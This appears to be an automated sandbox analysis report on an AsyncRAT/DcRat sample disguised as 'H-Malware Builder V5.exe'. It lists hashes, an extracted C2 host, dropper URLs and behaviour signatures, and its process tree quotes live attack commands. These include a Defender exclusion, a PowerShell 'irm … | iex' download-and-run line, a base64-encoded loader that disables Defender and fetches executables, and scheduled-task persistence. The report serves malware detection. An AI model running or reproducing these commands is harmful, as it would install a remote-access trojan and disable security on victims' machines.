Resubmissions

04/12/2024, 07:47

241204-jmh8dsyjgs 10

03/12/2024, 09:46

241203-lrs99szmav 10

Analysis

  • max time kernel
    121s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/12/2024, 09:46

General

  • Target

    H-Malware Builder V5.exe

  • Size

    407KB

  • MD5

    c8f6d76b4ae82978272bde392561c4f4

  • SHA1

    80447d36fcf88cc9caa806db53e22d9468cc31ee

  • SHA256

    c981ebcf0c0cf857162ae35b9385c22d3198c2ec9ea00e37fcfe74a79eb3510e

  • SHA512

    10fa87f050a9ceb658e443317158ef8b1dbaa9e183ec61b5e5e42adb562f7918d996134aba7f0bbad852def4d6b0824c7b9716628b554194d0fd95974de6b2ad

  • SSDEEP

    12288:r5p4UNBN3aqeKNoRfwoZrHMBV9EwEcb8+DvtuWUb:r9N3aqPCRooZwBjEhcYcvYWUb

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://github.com/MalwareTeam/SecurityHealthService/raw/main/SecurityHealthService.exe

exe.dropper

https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

bay-helps.gl.at.ply.gg:36538

Mutex

DcRatMutex_qwqdanchun

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Async RAT payload 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 50 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 43 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 40 IoCs
  • Executes dropped EXE 1 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 4 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 16 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 6 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 21 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 27 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 39 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:332
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{1886fbc6-febb-4b11-b087-7f83c54105d5}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3784
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Drops file in System32 directory
        PID:672
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:960
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:448
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:956
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1040
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1064
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                  • Drops file in System32 directory
                  PID:1212
                  • C:\Windows\system32\taskhostw.exe
                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                    2⤵
                      PID:2840
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                    1⤵
                    • Indicator Removal: Clear Windows Event Logs
                    PID:1220
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                    1⤵
                      PID:1328
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1344
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                        1⤵
                          PID:1392
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                          1⤵
                            PID:1436
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                            1⤵
                              PID:1448
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                              1⤵
                                PID:1464
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                1⤵
                                  PID:1608
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                  1⤵
                                    PID:1616
                                    • C:\Windows\system32\sihost.exe
                                      sihost.exe
                                      2⤵
                                        PID:2664
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                      1⤵
                                        PID:1680
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1756
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                          1⤵
                                            PID:1828
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1848
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                              1⤵
                                                PID:1956
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                1⤵
                                                  PID:2012
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:2020
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:1724
                                                    • C:\Windows\System32\spoolsv.exe
                                                      C:\Windows\System32\spoolsv.exe
                                                      1⤵
                                                        PID:2136
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                        1⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2152
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                        1⤵
                                                          PID:2244
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                          1⤵
                                                            PID:2356
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                            1⤵
                                                              PID:2464
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                              1⤵
                                                                PID:2472
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                1⤵
                                                                  PID:2676
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                  1⤵
                                                                  • Drops file in System32 directory
                                                                  PID:2784
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                  1⤵
                                                                  • Enumerates connected drives
                                                                  PID:2828
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                  1⤵
                                                                    PID:2852
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2860
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                      1⤵
                                                                        PID:2876
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                        1⤵
                                                                          PID:2896
                                                                        • C:\Windows\system32\wbem\unsecapp.exe
                                                                          C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                          1⤵
                                                                            PID:3104
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                            1⤵
                                                                              PID:3428
                                                                            • C:\Windows\Explorer.EXE
                                                                              C:\Windows\Explorer.EXE
                                                                              1⤵
                                                                              • Drops file in System32 directory
                                                                              • Modifies Internet Explorer settings
                                                                              • Modifies registry class
                                                                              • Suspicious behavior: AddClipboardFormatListener
                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              • Suspicious use of SendNotifyMessage
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:3556
                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                2⤵
                                                                                • Checks computer location settings
                                                                                • Drops startup file
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:4804
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                  3⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3520
                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
                                                                                  3⤵
                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                  • Checks computer location settings
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:2500
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
                                                                                    4⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4168
                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      5⤵
                                                                                        PID:2380
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell "irm pastie.io/raw/fgaazw | iex"
                                                                                        5⤵
                                                                                        • Blocklisted process makes network request
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:3676
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAGEAbQBkAHIAMQBpAHkAbAB0AFQAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAE0AYQBsAHcAYQByAGUAVABlAGEAbQAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC8AcgBhAHcALwBtAGEAaQBuAC8AUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8ATQBhAGwAdwBhAHIAZQBUAGUAYQBtAC8AUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALwByAGEAdwAvAG0AYQBpAG4ALwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
                                                                                          6⤵
                                                                                          • Blocklisted process makes network request
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3940
                                                                                    • C:\Windows\SYSTEM32\SCHTASKS.exe
                                                                                      "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
                                                                                      4⤵
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:5036
                                                                                    • C:\Windows\SYSTEM32\SCHTASKS.exe
                                                                                      "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
                                                                                      4⤵
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:4860
                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        5⤵
                                                                                          PID:3008
                                                                                    • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                      3⤵
                                                                                      • Checks computer location settings
                                                                                      • Drops startup file
                                                                                      PID:2884
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                        4⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4232
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          5⤵
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:4580
                                                                                      • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                        4⤵
                                                                                        • Checks computer location settings
                                                                                        • Drops startup file
                                                                                        PID:3788
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4104
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            6⤵
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:3804
                                                                                        • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                          5⤵
                                                                                          • Checks computer location settings
                                                                                          • Drops startup file
                                                                                          PID:4732
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                            6⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            PID:1180
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              7⤵
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:3496
                                                                                          • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                            6⤵
                                                                                            • Checks computer location settings
                                                                                            • Drops startup file
                                                                                            PID:2240
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                              7⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              PID:5076
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                8⤵
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:4952
                                                                                            • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                              7⤵
                                                                                              • Checks computer location settings
                                                                                              • Drops startup file
                                                                                              PID:428
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                8⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                PID:3212
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  9⤵
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:3144
                                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                8⤵
                                                                                                • Checks computer location settings
                                                                                                PID:2096
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                  9⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  PID:2956
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    10⤵
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:4752
                                                                                                • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                  9⤵
                                                                                                  • Checks computer location settings
                                                                                                  • Drops startup file
                                                                                                  PID:4532
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                    10⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    PID:2040
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                    10⤵
                                                                                                    • Checks computer location settings
                                                                                                    • Drops startup file
                                                                                                    PID:3708
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                      11⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      PID:3588
                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        12⤵
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:880
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                      11⤵
                                                                                                      • Checks computer location settings
                                                                                                      • Drops startup file
                                                                                                      PID:2652
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                        12⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        PID:3252
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          13⤵
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          PID:3372
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                        12⤵
                                                                                                        • Checks computer location settings
                                                                                                        • Drops startup file
                                                                                                        PID:1164
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                          13⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          PID:1128
                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            14⤵
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:4764
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                          13⤵
                                                                                                          • Checks computer location settings
                                                                                                          • Drops startup file
                                                                                                          PID:3356
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                            14⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            PID:1380
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                            14⤵
                                                                                                            • Checks computer location settings
